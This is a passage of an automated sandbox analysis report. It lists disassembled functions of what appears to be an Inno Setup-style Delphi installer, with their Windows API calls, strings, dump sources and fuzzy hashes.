                                                                                                      • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                      • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                      • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                    • API String ID: 854858120-615399546
                                                                                                    • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                    • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                                    • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                    • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                                    APIs
                                                                                                    • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                    • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                    • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                                                                    • String ID: 2$MAINICON
                                                                                                    • API String ID: 3935243913-3181700818
                                                                                                    • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                    • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                                    • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                    • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                                      • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                                      • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                      • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                      • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                      • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                      • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                      • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                      • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                      • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                      • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                      • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                      • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                    • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                    • API String ID: 316262546-2767913252
                                                                                                    • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                    • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                    • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                    • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                    APIs
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$Prop
                                                                                                    • String ID:
                                                                                                    • API String ID: 3887896539-0
                                                                                                    • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                    • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                    • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                    • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                    Strings
                                                                                                    • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                    • WININIT.INI, xrefs: 004557E4
                                                                                                    • PendingFileRenameOperations, xrefs: 00455754
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                    • API String ID: 47109696-2199428270
                                                                                                    • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                    • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                    • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                    • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                    • API String ID: 1375471231-2952887711
                                                                                                    • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                    • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                    • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                    • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                    APIs
                                                                                                    • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                    • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                    • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnumLongWindows
                                                                                                    • String ID: \AB
                                                                                                    • API String ID: 4191631535-3948367934
                                                                                                    • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                    • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                    • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                    • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                    APIs
                                                                                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                                                    • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                    • API String ID: 588496660-1846899949
                                                                                                    • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                    • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                    • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                    • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                    Strings
                                                                                                    • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                    • NextButtonClick, xrefs: 0046BC4C
                                                                                                    • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                    • API String ID: 0-2329492092
                                                                                                    • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                    • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                    • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                    • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                    APIs
                                                                                                    • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveChangeNotifyWindow
                                                                                                    • String ID: $Need to restart Windows? %s
                                                                                                    • API String ID: 1160245247-4200181552
                                                                                                    • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                    • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                    • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                    • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                    • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                    • String ID: Creating directory: %s
                                                                                                    • API String ID: 2451617938-483064649
                                                                                                    • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                    • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                    • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                    • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressByteCharMultiProcWide
                                                                                                    • String ID: SfcIsFileProtected$sfc.dll
                                                                                                    • API String ID: 2508298434-591603554
                                                                                                    • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                    • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                    • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                    • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                    • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                    • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoRegisterUnregister
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3749476976-2766056989
                                                                                                    • Opcode ID: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                                                    • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                    • Opcode Fuzzy Hash: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                                                    • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                    APIs
                                                                                                    • 75381520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                    • 75381500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                    • 75381540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
